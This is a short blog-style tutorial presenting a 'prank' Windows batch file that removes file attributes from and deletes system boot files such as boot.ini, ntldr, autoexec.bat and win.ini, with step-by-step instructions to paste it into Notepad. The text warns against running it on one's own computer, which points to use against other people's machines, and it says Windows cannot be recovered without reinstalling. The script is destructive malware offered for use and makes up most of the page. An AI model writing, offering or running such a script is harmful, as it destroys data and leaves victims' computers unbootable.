How to Shutdown a Computer Forever Batch Virus Prank
This is a Windows prank, learn how to shutdown computer forever with a simple batch file, this batch file start deleting very system useful file, it will shutdown computer with command, remember not to use this batch file attack on your computer, you will not be able to recover windows unless you re-install the windows.
1. Go to: Start > Run... (Or press Windows+R )
2. Type notepad and Click OK
3. Copy the following text and paste it to Notepad
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Comments
Post a Comment